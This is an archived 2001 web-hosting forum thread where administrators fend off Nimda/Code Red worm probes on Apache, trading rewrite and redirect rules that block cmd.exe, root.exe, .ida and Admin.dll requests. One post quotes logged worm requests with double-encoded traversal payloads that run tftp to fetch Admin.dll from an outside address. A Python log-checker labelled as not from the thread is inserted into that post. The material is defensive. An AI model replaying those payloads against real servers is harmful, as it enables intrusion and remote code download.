Web Hosting Talk

Code Red?


sbrad
10-09-2001, 08:37 PM
I've got a server getting absolutely hammered with DDoS attacks. The requests are coming from all over the map, so I'm guessing the IPs are spoofed.
The files requested are cmd.exe and root.exe... but it's a Linux box. This is killing Apache. It keeps dying, then comes up, only to get hammered again.

Does anyone have ANY ideas on what I can do? I'm tailing the error_log and adding those IPs to hosts.deny, but I'm guessing that's not doing much good.

The really weird part is that this isn't aimed against any one site or IP. It's going through each virtual site, somehow.

RackMy.com
10-09-2001, 08:59 PM
That's part of the Nimda/Code-red virus; it scans IP blocks looking for vulnerable systems.

One way to stop it is to get yourself a firewall. Netscreen released an OS update for us which blocks out the Nimda/Code-Red/Code-Blue virus completely.

dektong
10-09-2001, 09:02 PM
Do you have a custom 404 error page, by any chance?
Perhaps this article (http://www.webmasterbase.com/article.php?aid=566) (from SitePoint) can help you...

cheers,
:beer:

sbrad
10-09-2001, 10:29 PM
That was a great article. Thanks dektong.
Does anyone know if there's any way to add that bit about the custom error pages somewhere else, like httpd.conf? I have almost 200 sites on this machine, and it'd be a real shame to have to do that many .htaccess files.

davidb
10-09-2001, 10:46 PM
Sbrad, I never tried this before, but .htaccess files work from the base up; by that I mean, if you put a .htaccess file in /home it works in /home/hi/1, /home/hi/2, etc. So what you could try is making a base .htaccess file, then putting the errorlog code in it.

Synergy
10-09-2001, 11:11 PM
There is an antihak Apache module to fix this as well.

sbrad
10-09-2001, 11:19 PM
Originally posted by Synergy

There is an antihak Apache module to fix this as well.

Cool. Any idea where I can get my hands on it?

Synergy
10-09-2001, 11:21 PM
http://www.linuxd3v.net/downloads/mod_antihak-0.8-beta.tar.gz

read more at:

http://www.linuxd3v.net/article.php?sid=32&mode=thread&order=0

sbrad
10-09-2001, 11:43 PM
That looks perfect. How would I install it? Couldn't find that anywhere.

Synergy
10-09-2001, 11:49 PM
Are you running WHM / Cpanel?

sbrad
10-10-2001, 12:56 AM
Sure am.
I took a novel approach and read the directions. :)
Got errors, though. Is there a way to do it with WHM?

freakysid
10-10-2001, 08:56 PM
Here is what I have done. Tell me what you think of this approach. In my httpd.conf:

# piss-off worms
# mod_rewrite has to be switched on for the rules below to do anything
RewriteEngine On
RewriteCond %{REQUEST_URI} (cmd\.exe) [OR]
RewriteCond %{REQUEST_URI} (root\.exe) [OR]
RewriteCond %{REQUEST_URI} (\.ida) [OR]
RewriteCond %{REQUEST_URI} (Admin\.dll)
# hand every matching request an empty file instead of a 404 page
RewriteRule ^.*$ /path/to/my/server/root/empty.txt [L]

And then...

cp /dev/null /path/to/my/server/root/empty.txt

A few lines from my access_log show that zero bytes were served:

64.169.117.150 - - [10/Oct/2001:20:43:03 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:07 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:12 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:16 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.169.116.51%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 0
64.169.117.150 - - [10/Oct/2001:20:43:21 -0400] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 0

<<edited>>

I guess I could have just put /dev/null into the RewriteRule :rolleyes:
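What sbrad was doing by hand with tail on the error_log, as an added example that is not from the thread: a Python checker that parses Apache common-log-format lines, decodes Nimda's double-encoded traversal before matching, tallies the probes named in this thread (cmd.exe, root.exe, .ida, Admin.dll) per source address, and flags any probe that still drew a response body. The sample lines are constructed, modelled on freakysid's excerpt with RFC 5737 test addresses.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Probe names from the thread's access_log: cmd.exe, root.exe, .ida, Admin.dll.
SIG_RE = re.compile(r"(cmd\.exe|root\.exe|\.ida|admin\.dll)", re.I)
# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)$')

def normalize_path(path):
    # Nimda double-encodes its traversal ("..%252f.." -> "..%2f.." -> "../"); decode until stable.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    # Returns (host, signature, status, bytes_sent, traversal) or None if the line is clean.
    m = LOG_RE.match(line)
    if not m:
        return None
    host, raw_path, status, nbytes = m.groups()
    path = normalize_path(raw_path)
    sig = SIG_RE.search(path)
    if not sig:
        return None
    return host, sig.group(1).lower(), int(status), int(nbytes) if nbytes != "-" else 0, "../" in path

def summarize(lines):
    # Tally probes per source host and signature; keep any that still drew a body (a 404 page counts).
    per_host, per_sig, served_body = Counter(), Counter(), []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        host, sig, status, nbytes, _ = hit
        per_host[host] += 1
        per_sig[sig] += 1
        if nbytes > 0:
            served_body.append(line)
    return per_host, per_sig, served_body

# Constructed sample lines modelled on the thread's access_log (RFC 5737 test addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2001:20:43:03 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0',
    '192.0.2.10 - - [10/Oct/2001:20:43:21 -0400] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 0',
    '192.0.2.11 - - [10/Oct/2001:20:44:02 -0400] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 287',
    '192.0.2.12 - - [10/Oct/2001:20:45:00 -0400] "GET /index.html HTTP/1.0" 200 1024',
]
```

Run summarize() over a real access_log and the third result tells you whether the rewrite above is really serving zero bytes to every probe.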

Annette
10-10-2001, 09:43 PM
Originally posted by freakysid


<<edited>>

I guess I could have just put /dev/null into the RewriteRule :rolleyes:

Here's what we did, to filter that stuff out of existence:


RedirectMatch ^.*\.(dll|ida).* /dev/null
RedirectMatch ^.*cmd\..* /dev/null
RedirectMatch ^.*root\..* /dev/null

Helps to keep the error log situation under control, and the users don't have to see the continuous requests.

Synergy
10-10-2001, 10:36 PM
Are you saying that the module is no use?

Domenico
10-11-2001, 05:49 AM
So, is the antihak module working? And does it work with Cpanel/WHM?

horoscopes2000
12-03-2001, 03:59 PM
Originally posted by Annette


Here's what we did, to filter that stuff out of existence:


RedirectMatch ^.*\.(dll|ida).* /dev/null
RedirectMatch ^.*cmd\..* /dev/null
RedirectMatch ^.*root\..* /dev/null

Hi Annette,

Do you mind me asking where you added those lines? Requests for cmd.exe are becoming plentiful on my server.

I am on a RaQ3

clocker1996
12-03-2001, 04:35 PM
httpd.conf

horoscopes2000
12-03-2001, 04:46 PM
Thank you for your help.

I tried a "find httpd.conf" and don't seem to have that one. Do I need to create it, and if so, where should I put it?